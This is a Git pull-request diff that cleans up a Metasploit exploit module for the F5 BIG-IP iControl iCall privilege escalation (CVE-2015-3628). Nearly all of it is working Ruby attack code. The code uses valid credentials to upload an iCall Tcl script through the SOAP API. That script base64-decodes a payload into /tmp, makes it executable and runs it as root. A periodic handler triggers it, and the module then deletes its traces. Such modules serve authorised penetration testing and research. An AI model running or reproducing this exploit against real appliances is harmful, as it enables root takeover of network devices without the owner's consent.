Merge pull request #6 from jhart-r7/pr/fixup-6228

More cleanup of F5 BIG-IP iCall privilege escalation vulnerability (CVE-2015-3628)

Author: m0t

modules/exploits/linux/http/f5_icall_cmd.rb

@@ -11,16 +11,22 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
 
+  SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" }
+  STRING_ATTRS = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
+  LONG_ATTRS = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
+
   def initialize(info = {})
     super(
       update_info(
         info,
         'Name'           => "F5 iControl iCall::Script Root Command Execution",
         'Description'    => %q{
-          This module exploits an authenticated a privilege escalation vulnerability
-          in the iControl API on the F5 BIG-IP LTM (and likely other F5 devices). The attacker needs valid
-          credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0,
-          (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references for more details)
+          This module exploits an authenticated privilege escalation
+          vulnerability in the iControl API on the F5 BIG-IP LTM (and likely
+          other F5 devices). This requires valid credentials and the Resource
+          Administrator role. The exploit should work on BIG-IP 11.3.0
+          - 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references
+          for more details)
         },
         'License'        => MSF_LICENSE,
         'Author'         =>
@@ -55,11 +61,18 @@ def initialize(info = {})
       [
         OptInt.new('INTERVAL', [ true, 'Time interval before the iCall::Handler is called, in seconds', 3 ]),
         OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']),
-        OptString.new('FILENAME', [false, 'File name of the dropped payload', '.9cdfb439c7876e70']),
+        OptString.new('FILENAME', [false, 'File name of the dropped payload, defaults to random']),
         OptInt.new('ARG_MAX', [true, 'Command line length limit', 131072])
       ])
   end
 
+  def setup
+    file = datastore['FILENAME']
+    file ||= ".#{Rex::Text.rand_text_alphanumeric(16)}"
+    @payload_path = ::File.join(datastore['PATH'], file)
+    super
+  end
+
   def build_xml
     builder = Nokogiri::XML::Builder.new do |xml|
       xml.Envelope do
@@ -92,88 +105,75 @@ def send_soap_request(pay)
       'username' => datastore['USERNAME'],
       'password' => datastore['PASSWORD']
     )
-    if res && res.code == 200
+    if res
       return res
-    elsif res
-      if res.code == 401
-        print_error('401 Unauthorized - Check credentials')
-      else
-        print_error("#{res.code} - Unknown error")
-      end
     else
       vprint_error('No response')
     end
     false
   end
 
-  # cmd is valid tcl script
-  def create_script(cmd)
-    scriptname = Rex::Text.rand_text_alpha_lower(5)
+  def create_script(name, cmd)
     create_xml = build_xml do |xml|
-      xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-        string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-        xml.scripts(string_attrs) do
+      xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
+        xml.scripts(STRING_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-          xml.item scriptname
+          xml.item name
         end
-        xml.definitions(string_attrs) do
+        xml.definitions(STRING_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
           xml.item cmd
         end
       end
     end
-    send_soap_request(create_xml) ? scriptname : false
+    send_soap_request(create_xml)
   end
 
-  def delete_script(scriptname)
+  def delete_script(script_name)
     delete_xml = build_xml do |xml|
-      xml['scr'].delete_script("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-        string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-        xml.scripts(string_attrs) do
+      xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do
+        xml.scripts(STRING_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-          xml.item scriptname
+          xml.item script_name
         end
       end
     end
     send_soap_request(delete_xml)
   end
 
-  def script_exists(scriptname)
+  def script_exists(script_name)
     exists_xml = build_xml do |xml|
-      xml['scr'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
+      xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
     end
     res = send_soap_request(exists_xml)
-    res && res.code == 200 && res.body =~ Regexp.new("/Common/#{scriptname}")
+    res && res.code == 200 && res.body =~ Regexp.new("/Common/#{script_name}")
   end
 
-  def create_handler(scriptname, interval)
-    handler_name = Rex::Text.rand_text_alpha_lower(5)
+  def create_handler(handler_name, script_name, interval)
     handler_xml = build_xml do |xml|
-      xml['per'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-        string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-        xml.handlers(string_attrs) do
+      xml['per'].create(SOAPENV_ENCODINGSTYLE) do
+        xml.handlers(STRING_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
           xml.item handler_name
         end
-        xml.scripts(string_attrs) do
+        xml.scripts(STRING_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-          xml.item scriptname
+          xml.item script_name
         end
-        long_attrs = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
-        xml.intervals(long_attrs) do
+        xml.intervals(LONG_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
           xml.item interval
         end
       end
     end
-    send_soap_request(handler_xml) ? handler_name : false
+    res = send_soap_request(handler_xml)
+    res && res.code == 200 && res.body =~ Regexp.new("iCall/PeriodicHandler")
   end
 
   def delete_handler(handler_name)
     delete_xml = build_xml do |xml|
-      xml['per'].delete_handler("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-        attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-        xml.handlers(attrs) do
+      xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do
+        xml.handlers(STRING_ATTRS) do
           xml.parent.namespace = xml.parent.parent.namespace_definitions.first
           xml.item handler_name
         end
@@ -185,7 +185,7 @@ def delete_handler(handler_name)
 
   def handler_exists(handler_name)
     handler_xml = build_xml do |xml|
-      xml['per'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
+      xml['per'].get_list(SOAPENV_ENCODINGSTYLE)
     end
     res = send_soap_request(handler_xml)
     res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
@@ -197,31 +197,11 @@ def check
     # XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'.
     # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
     # any other response is considered not vulnerable
-    check_xml = build_xml do |xml|
-      xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
-        attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
-        xml.scripts(attrs) do
-          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-          xml.item
-        end
-        xml.definitions(attrs) do
-          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
-          xml.item
-        end
-      end
-    end
-
-    res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path),
-      'method' => 'POST',
-      'data' => check_xml,
-      'username' => datastore['USERNAME'],
-      'password' => datastore['PASSWORD']
-    )
+    res = create_script('', '')
     if res && res.code == 500 && res.body =~ /path is empty/
       return Exploit::CheckCode::Appears
     elsif res && res.code == 401
-      print_error('401 Unauthorized')
+      print_warning("HTTP/#{res.proto} #{res.status} #{res.message} -- incorrect USERNAME or PASSWORD?")
       return Exploit::CheckCode::Unknown
     else
       return Exploit::CheckCode::Safe
@@ -230,13 +210,8 @@ def check
 
   def exploit
     # phase 1: create iCall script to create file with payload, execute it and remove it.
-    filepath = datastore['PATH']
-    filename = datastore['FILENAME']
-    dest_file = filepath + '/' + filename
-    register_file_for_cleanup dest_file
-
-    shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{dest_file}; chmod +x #{dest_file};#{dest_file};rm -f #{dest_file})
-    cmd = %(if { ! [file exists #{dest_file}]} { exec /bin/sh -c "#{shell_cmd}"})
+    shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path})
+    cmd = %(if { ! [file exists #{@payload_path}]} { exec /bin/sh -c "#{shell_cmd}"})
 
     arg_max = datastore['ARG_MAX']
     if shell_cmd.size > arg_max
@@ -247,28 +222,32 @@ def exploit
 
     print_status('Uploading payload...')
 
-    unless (script = create_script(cmd))
+    script_name = Rex::Text.rand_text_alpha_lower(5)
+    create_script_res = create_script(script_name, cmd)
+    unless create_script_res && create_script_res.code == 200
       print_error("Upload script failed")
       return false
     end
-    unless script_exists(script)
+    unless script_exists(script_name)
       print_error("create_script() run successfully but script was not found")
       return false
     end
+    register_file_for_cleanup @payload_path
+
     interval = datastore['INTERVAL']
 
     # phase 2: create iCall Handler, that will actually run the previously created script
     print_status('Creating trigger...')
-    handler = create_handler(script, interval)
-    unless handler
+    handler_name = Rex::Text.rand_text_alpha_lower(5)
+    unless create_handler(handler_name, script_name, interval)
       print_error('Script uploaded but create_handler() failed')
       return false
     end
     print_status('Wait until payload is executed...')
 
     sleep(interval) # small delay, just to make sure
     print_status('Trying cleanup...')
-    if delete_handler(handler) && delete_script(script)
+    if delete_handler(handler_name) && delete_script(script_name)
       print_status('Cleanup finished with no errors')
     else
       print_error('Error while cleaning up')